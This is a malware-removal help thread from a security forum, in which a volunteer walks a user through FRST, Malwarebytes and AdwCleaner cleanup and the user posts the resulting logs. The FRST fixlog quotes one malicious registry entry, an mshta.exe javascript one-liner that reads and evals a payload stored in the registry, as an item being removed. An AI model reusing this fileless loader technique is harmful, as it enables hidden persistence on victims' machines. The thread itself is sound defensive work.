 
 
==================== Informações da Memória =========================== 
 
Processador: Intel® Core™ i5-5200U CPU @ 2.20GHz
Percentagem de memória em uso: 36%
RAM física total: 8106.45 MB
RAM física disponível: 5171.34 MB
Virtual Total: 9386.45 MB
Virtual disponível: 6108.78 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:922.14 GB) (Free:186.38 GB) NTFS
 
==================== MBR & Tabela de Partições ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 937D90CC)
 
Partition: GPT.
 
==================== Fim de Addition.txt ============================


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,683 posts

Posted 03 August 2017 - 02:49 PM

Alright, follow the instructions below.

Farbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located);
  • Right-click on the FRST executable and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 Hercilio

Hercilio
  • Topic Starter

  • Members
  • 9 posts

Posted 03 August 2017 - 04:03 PM

Resultado da Correção pela Farbar Recovery Scan Tool (x64) Versão: 31-07-2017
Executado por Hercílio (03-08-2017 17:52:05) Run:2
Executando a partir de C:\Users\Hercílio\Desktop
Perfis Carregados: Hercílio (Perfis Disponíveis: Hercílio)
Modo da Inicialização: Normal
==============================================
 
fixlist Conteúdo:
*****************
CloseProcesses:
CreateRestorePoint:
 
REG: REG QUERY HKEY_CURRENT_USER\Software\jgsxvl /s
 
DeleteKey: HKEY_CURRENT_USER\Software\jgsxvl
 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\Run: [psexe] => C:\Users\Hercílio\AppData\Roaming\pxese.exe [1835008 2017-08-03] ()
HKU\S-1-5-18\...\Run: [psexe] => C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\pxese.exe [1835008 2017-08-03] ()
GroupPolicy: Restrição <==== ATENÇÃO
CHR HKLM\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO
CHR HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Policies\Google: Restrição <==== ATENÇÃO
 
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
 
HKU\.DEFAULT\Software\Classes\15c1c1c: "C:\WINDOWS\system32\mshta.exe" "javascript:V0Mr2W="RZ9A6Jb";N2n=new ActiveXObject("WScript.Shell");rPtAR52="GaXZcEtG";Pf8X9X=N2n.RegRead("HKCU\\software\\jgsxvl\\ehwentqye");jpOrbSG1="p";eval(Pf8X9X);El3JI="uLK";" <==== ATENÇÃO
 
Task: {1A1ADE13-9829-4331-9213-7764F1E76D34} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Nenhum Arquivo <==== ATENÇÃO
Task: {2AD8317F-D205-44E5-AE59-0781E8ACE7D5} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {34FB3448-893F-493D-ABD7-09D4BDFF762B} - System32\Tasks\{92CF0002-651B-43D2-8151-C19D7B8F7290} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files\ByteFence\ByteFence.exe" -c /uninstall
Task: {3BFFF2D2-D819-4EFB-AEA7-37F7FA841A7C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Nenhum Arquivo <==== ATENÇÃO
Task: {538DCEB1-FD32-444F-B278-E6457C101F82} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {55CE1D81-E387-4B19-B73E-14252D65ED9F} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {69E8BADB-4394-4892-87DF-C5A9163071CA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {8DBC6239-677F-4B5F-A513-81FB4E682BAD} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {A8213CD5-D9EF-4E86-AB53-6596AE36500C} - System32\Tasks\{A493C15F-E0DF-44CC-B7FE-7D53EFDA7A50} => "c:\program files (x86)\google\chrome\application\chrome.exe" hxxp://ui.skype.com/ui/0/7.24.85.104/pt/abandoninstall?page=tsMain
Task: {A9CDABCE-90E9-4EAA-8B26-ACCA1D6BBA1E} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Nenhum Arquivo <==== ATENÇÃO
Task: {AE535F27-94A0-4DE8-A25F-8632948727EB} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Nenhum Arquivo <==== ATENÇÃO
Task: {B80159A1-5CFF-47F5-8159-DD903066A604} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {D52EB235-BE84-4E14-8C8B-FE88D28618A9} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Nenhum Arquivo <==== ATENÇÃO
Task: {DC6E9AF2-310F-4A8B-8AB1-C9B33FA63496} - System32\Tasks\{FB1438C9-653B-4FD0-A4F5-559B9D954CCC} => C:\WINDOWS\system32\pcalua.exe -a "C:\Program Files (x86)\Pcsx2\pcsx2.exe" -d "C:\Program Files (x86)\Pcsx2"
Task: {EA230FE4-0415-4E21-A56D-50F45B384B30} - System32\Tasks\RealtekUpdate => wscript "C:\Users\Hercílio\AppData\Roaming\Realtek\Realtek\RealtekUpdate.vbs"
 
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\...\StartupApproved\Run: => "psexe"
 
C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
C:\Users\Hercílio\Downloads\KMSpico 10.1.8 FINAL + Portable (Office and Windows 10 Activator) [TechTools]
C:\Users\Hercílio\AppData\Local\{31609F87-792D-452B-A799-CB0D7B589CF5}
C:\Users\Hercílio\AppData\Local\{5E3C3A73-CDE7-406C-A35C-482B7D6618E2}
C:\Users\Hercílio\AppData\Local\{6F2A5D38-59DF-44FC-A339-6546150E9A01}
C:\Users\Hercílio\AppData\Local\{85380981-3389-4860-8A4F-201B694530DF}
C:\Users\Hercílio\AppData\Local\{DFA58381-49E3-4E5B-A149-EB3B89B425DA}
C:\Users\Hercílio\AppData\Local\{E8EF03DA-F8BA-439A-A4BB-546EEE37B099}
C:\Users\Hercílio\AppData\Local\{FEECC933-41BE-42BE-A6B8-8C8722F071D8}
C:\Users\Hercílio\AppData\Roaming\F348644F8C8E38493023A2CA41BE1BED
C:\Users\Hercílio\AppData\Roaming\E7BD4BE3219227505EC81A001EF0D262
C:\Users\Hercílio\AppData\Roaming\766304432F4B4AF71668BA8EE91BAB73
C:\Users\Hercílio\AppData\Roaming\F70555010177884C9C2184467F078255
C:\Users\Hercílio\AppData\Roaming\78DF6D034C85415260CC2E9412198DB6
C:\Users\Hercílio\AppData\Roaming\Realtek
C:\Users\Hercílio\AppData\Roaming\appdataFr25.bin
C:\Users\Hercílio\AppData\Roaming\del.bat
C:\Users\Hercílio\AppData\Roaming\pxese.exe
C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\pxese.exe
C:\WINDOWS\SECOH-QAD.exe
C:\WINDOWS\SECOH-QAD.dll
 
Hosts:
EmptyTemp:
*****************
 
Processos fechados com sucesso.
Ponto de Restauração criado com sucesso.
 
========= REG QUERY HKEY_CURRENT_USER\Software\jgsxvl /s =========
 
ERRO: O sistema nÆo p“de localizar a chave do Registro ou valor especificado.
 
 
========= Fim de Reg: =========
 
HKEY_CURRENT_USER\Software\jgsxvl => chave não encontrado (a). 
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\Software\Microsoft\Windows\CurrentVersion\Run\\psexe => valor removido (a) com sucesso.
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\psexe => valor removido (a) com sucesso.
C:\WINDOWS\system32\GroupPolicy\Machine => movido com sucesso
C:\WINDOWS\system32\GroupPolicy\GPT.ini => movido com sucesso
HKLM\SOFTWARE\Policies\Google => chave removido (a) com sucesso.
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Policies\Google => chave removido (a) com sucesso.
Chrome DefaultSearchURL => removido (a) com sucesso.
Chrome DefaultSuggestURL => removido (a) com sucesso.
HKU\.DEFAULT\Software\Classes\15c1c1c => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1A1ADE13-9829-4331-9213-7764F1E76D34} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1A1ADE13-9829-4331-9213-7764F1E76D34} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2AD8317F-D205-44E5-AE59-0781E8ACE7D5} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2AD8317F-D205-44E5-AE59-0781E8ACE7D5} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{34FB3448-893F-493D-ABD7-09D4BDFF762B} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{34FB3448-893F-493D-ABD7-09D4BDFF762B} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\{92CF0002-651B-43D2-8151-C19D7B8F7290} => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{92CF0002-651B-43D2-8151-C19D7B8F7290} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3BFFF2D2-D819-4EFB-AEA7-37F7FA841A7C} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3BFFF2D2-D819-4EFB-AEA7-37F7FA841A7C} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{538DCEB1-FD32-444F-B278-E6457C101F82} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{538DCEB1-FD32-444F-B278-E6457C101F82} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{55CE1D81-E387-4B19-B73E-14252D65ED9F} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{55CE1D81-E387-4B19-B73E-14252D65ED9F} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{69E8BADB-4394-4892-87DF-C5A9163071CA} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{69E8BADB-4394-4892-87DF-C5A9163071CA} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8DBC6239-677F-4B5F-A513-81FB4E682BAD} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8DBC6239-677F-4B5F-A513-81FB4E682BAD} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A8213CD5-D9EF-4E86-AB53-6596AE36500C} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A8213CD5-D9EF-4E86-AB53-6596AE36500C} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\{A493C15F-E0DF-44CC-B7FE-7D53EFDA7A50} => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A493C15F-E0DF-44CC-B7FE-7D53EFDA7A50} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A9CDABCE-90E9-4EAA-8B26-ACCA1D6BBA1E} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A9CDABCE-90E9-4EAA-8B26-ACCA1D6BBA1E} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AE535F27-94A0-4DE8-A25F-8632948727EB} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AE535F27-94A0-4DE8-A25F-8632948727EB} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B80159A1-5CFF-47F5-8159-DD903066A604} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B80159A1-5CFF-47F5-8159-DD903066A604} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D52EB235-BE84-4E14-8C8B-FE88D28618A9} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D52EB235-BE84-4E14-8C8B-FE88D28618A9} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DC6E9AF2-310F-4A8B-8AB1-C9B33FA63496} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DC6E9AF2-310F-4A8B-8AB1-C9B33FA63496} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\{FB1438C9-653B-4FD0-A4F5-559B9D954CCC} => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{FB1438C9-653B-4FD0-A4F5-559B9D954CCC} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EA230FE4-0415-4E21-A56D-50F45B384B30} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EA230FE4-0415-4E21-A56D-50F45B384B30} => chave removido (a) com sucesso.
C:\WINDOWS\System32\Tasks\RealtekUpdate => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RealtekUpdate => chave removido (a) com sucesso.
C:\Program Files (x86)\GbPlugin => ":IncompleteStartProcessProtection.cnt" ADS removido (a) com sucesso..
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\\psexe => valor removido (a) com sucesso.
HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\\psexe => valor não encontrado (a).
C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A} => movido com sucesso
C:\Users\Hercílio\Downloads\KMSpico 10.1.8 FINAL + Portable (Office and Windows 10 Activator) [TechTools] => movido com sucesso
C:\Users\Hercílio\AppData\Local\{31609F87-792D-452B-A799-CB0D7B589CF5} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{5E3C3A73-CDE7-406C-A35C-482B7D6618E2} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{6F2A5D38-59DF-44FC-A339-6546150E9A01} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{85380981-3389-4860-8A4F-201B694530DF} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{DFA58381-49E3-4E5B-A149-EB3B89B425DA} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{E8EF03DA-F8BA-439A-A4BB-546EEE37B099} => movido com sucesso
C:\Users\Hercílio\AppData\Local\{FEECC933-41BE-42BE-A6B8-8C8722F071D8} => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\F348644F8C8E38493023A2CA41BE1BED => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\E7BD4BE3219227505EC81A001EF0D262 => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\766304432F4B4AF71668BA8EE91BAB73 => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\F70555010177884C9C2184467F078255 => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\78DF6D034C85415260CC2E9412198DB6 => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\Realtek => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\appdataFr25.bin => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\del.bat => movido com sucesso
C:\Users\Hercílio\AppData\Roaming\pxese.exe => movido com sucesso
C:\WINDOWS\SysWOW64\config\systemprofile\AppData\Roaming\pxese.exe => movido com sucesso
C:\WINDOWS\SECOH-QAD.exe => movido com sucesso
C:\WINDOWS\SECOH-QAD.dll => movido com sucesso
C:\Windows\System32\Drivers\etc\hosts => movido com sucesso
Hosts restaurado com sucesso.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 7888896 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 19275146 B
Java, Flash, Steam htmlcache => 449251000 B
Windows/system/drivers => 3098688 B
Edge => 389445 B
Chrome => 466114035 B
Firefox => 6780063 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 26294 B
NetworkService => 574214 B
Hercílio => 10428428 B
 
RecycleBin => 0 B
EmptyTemp: => 919.2 MB de dados temporários Removidos.
 
================================
 
 
O sistema precisou ser reiniciado.
 
==== Fim de Fixlog 17:54:43 ====


#6 Hercilio


Posted 03 August 2017 - 04:05 PM

Hello Aura!

 

Thank you for the support! The file is not there and everything seems to be working just fine!

 

Again, thank you for the help and the patience!

 

Will wait for an answer about the Fixlog. :)



#7 Aura


Posted 03 August 2017 - 05:42 PM

Good :) Now, there's two things I would like to do before I let you go.

First, can you .zip the following folder C:\FRST\Quarantine and upload it to the link below?

http://www.bleepingcomputer.com/submit-malware.php?channel=194

And secondly, we'll run a scan with Malwarebytes to make sure there's nothing left behind.

Malwarebytes - Clean Mode
  • Download and install the free version of Malwarebytes
    Note: If you have Malwarebytes already installed, you don't need to install it again. Simply start from the next bullet point;
  • Once Malwarebytes is installed, launch it and let it update its database. You might have to click on the little arrow by Scan Status in the middle right pane for it to do so;
  • Once the database update is complete, click on the Scan tab, then select the Threat Scan button and click on Start Scan;
  • Let the scan run; the time required to complete the scan depends on your system and computer specs;
  • Once the scan is complete, make sure that the first checkbox at the top is checked (which will automatically check every detected item), then click on the Quarantine Selected button;
    • If it asks you to restart your computer to complete the removal, do so;
  • Click on Export Summary after the deletion (in the bottom-left corner) and select Copy to Clipboard. Paste the content in your next reply;

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#8 Hercilio


Posted 04 August 2017 - 07:20 AM

Hello Aura

 

I tried to upload the .zip file but it seems to be too big (16MB) and the link to upload gave me the "The size of your file is greater than maximum file size of 10 MBs."

 

I'm scanning with MalwareBytes, will show Export Summary on next post. 



#9 Aura


Posted 04 August 2017 - 07:25 AM

You can upload it on SendSpace, and PM me the download URL.

https://www.sendspace.com/



#10 Hercilio


Posted 04 August 2017 - 07:34 AM

Hello Aura

 

I've sent the quarantine .zip file through PM and here is the Export Summary:

 

Malwarebytes
www.malwarebytes.com
 
-Detalhes de registro-
Data da análise: 04/08/17
Hora da análise: 09:21
Arquivo de registro: Export Summary.txt
Administrador: Sim
 
-Informação do software-
Versão: 3.1.2.1733
Versão de componentes: 1.0.160
Versão do pacote de definições: 1.0.2507
Licença: Grátis
 
-Informação do sistema-
Sistema operacional: Windows 10 (Build 15063.483)
CPU: x64
Sistema de arquivos: NTFS
Usuário: PC-NETINHO\Herc\u00c3\u00adlio
 
-Resumo da análise-
Tipo de análise: Análise de Ameaças
Resultado: Concluído
Objetos verificados: 435608
Ameaças detectadas: 14
Ameaças em quarentena: 14
Tempo decorrido: 9 min, 42 seg
 
-Opções da análise-
Memória: Habilitado
Inicialização: Habilitado
Sistema de arquivos: Habilitado
Arquivos compactados: Desabilitado
Rootkits: Desabilitado
Heurística: Habilitado
PUP: Habilitado
PUM: Habilitado
 
-Detalhes da análise-
Processo: 2
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Quarentena, [1181], [396386],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\MONITOR.EXE, Quarentena, [1181], [398206],1.0.2507
 
Módulo: 2
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Quarentena, [1181], [396386],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\MONITOR.EXE, Quarentena, [1181], [398206],1.0.2507
 
Chave de registro: 1
PUP.Optional.AdvancedSystemCare, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\AdvancedSystemCareService10, Excluir ao reiniciar, [1181], [396386],1.0.2507
 
Valor de registro: 1
PUP.Optional.AdvancedSystemCare, HKU\S-1-5-21-459013025-3067968454-1995941679-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Advanced SystemCare 10, Excluir ao reiniciar, [1181], [396386],1.0.2507
 
Dados de registro: 0
(Nenhum item malicioso detectado)
 
Fluxo de dados: 0
(Nenhum item malicioso detectado)
 
Pasta: 0
(Nenhum item malicioso detectado)
 
Arquivo: 8
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCSERVICE.EXE, Excluir ao reiniciar, [1181], [396386],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\ASCTRAY.EXE, Excluir ao reiniciar, [1181], [396386],1.0.2507
PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.6\STANDALONEPHASE1.DAT, Excluir ao reiniciar, [676], [393793],1.0.2507
PUP.Optional.OpenCandy, C:\USERS\HERCíLIO\DOWNLOADS\CHEATENGINE67.EXE, Excluir ao reiniciar, [509], [101648],1.0.2507
PUP.Optional.OpenCandy, C:\USERS\HERCíLIO\DOWNLOADS\CHEATENGINE66.EXE, Excluir ao reiniciar, [509], [101648],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\PROGRAM FILES (X86)\IOBIT\ADVANCED SYSTEMCARE\MONITOR.EXE, Excluir ao reiniciar, [1181], [398206],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\WINDOWS\SYSTEM32\TASKS\ASC10_PerformanceMonitor, Excluir ao reiniciar, [1181], [380341],1.0.2507
PUP.Optional.AdvancedSystemCare, C:\WINDOWS\SYSTEM32\TASKS\ASC10_SkipUac_Hercílio, Excluir ao reiniciar, [1181], [380341],1.0.2507
 
Setor físico: 0
(Nenhum item malicioso detectado)
 
 
(end)


#11 Aura


Posted 04 August 2017 - 07:40 AM

Good, thank you :)

For future reference (or for other users that are having the same issues and reading through this thread), Malwarebytes can detect and delete this threat (pxese.exe).

https://www.virustotal.com/en/file/cdcb6840b67ab0c96509916c1abb1d029a7b4d3bde4ba5983eebc4482a7789f1/analysis/1501850237/

Another threat present on your system was a BTC miner.

https://www.virustotal.com/en/file/a2891707cdfd3dc555d697d6e2037ac2eecdfcd52fb6ca74237dd1a458a4ec1c/analysis/1501850221/

Now we'll run a sweep with AdwCleaner and JRT.

AdwCleaner - Fix Mode
  • Download AdwCleaner and move it to your Desktop;
  • Right-click on AdwCleaner.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the EULA (I accept), then click on Scan;
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Clean button. This will kill all active processes;
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it;
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply;
Junkware Removal Tool (JRT)
  • Download Junkware Removal Tool (JRT) and move it to your Desktop;
  • Right-click on JRT.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Press on any key to launch the scan and let it complete;
  • Once the scan is complete, a log will open. Please copy/paste the content of the output log in your next reply;
Your next reply(ies) should therefore contain:
  • Copy/pasted AdwCleaner clean log;
  • Copy/pasted JRT log;

Edited by Aura, 04 August 2017 - 07:41 AM.



#12 Hercilio


Posted 04 August 2017 - 08:19 AM

Hello Aura

 

Here is the AdwCleaner log:

 

# AdwCleaner 7.0.1.0 - Logfile created on Fri Aug 04 13:06:35 2017
# Updated on 2017/05/08 by Malwarebytes 
# Running on Windows 10 Home Single Language (X64)
# Mode: clean
 
***** [ Services ] *****
 
Deleted: AdvancedSystemCareService10
 
 
***** [ Folders ] *****
 
Deleted: C:\ProgramData\IObit\Advanced SystemCare
Deleted: C:\Windows\System32\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Windows\System32\config\systemprofile\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Program Files (x86)\IObit\Advanced SystemCare
Deleted: C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare
Deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\All Users\IObit\Advanced SystemCare
Deleted: C:\Users\Hercílio\AppData\LocalLow\IObit\Advanced SystemCare
Deleted: C:\Users\Hercílio\AppData\Roaming\IObit\Advanced SystemCare
Deleted: C:\Users\Todos os Usuários\IObit\Advanced SystemCare
Deleted: C:\Users\Hercílio\AppData\Local\slimware utilities inc
Deleted: C:\Users\Public\Documents\pc faster
Deleted: C:\Users\Public\Documents\Guid
Deleted: C:\Users\Public\Documents\Downloaded Installers
Deleted: C:\Users\Hercílio\AppData\Local\SlimWare Utilities Inc
Deleted: C:\ProgramData\IObit\ASCDownloader
Deleted: C:\Users\All Users\IObit\ASCDownloader
Deleted: C:\Users\Todos os Usuários\IObit\ASCDownloader
Deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare
Deleted: C:\ProgramData\50e0d510-87b9-4817-aac6-3c02b26d2112
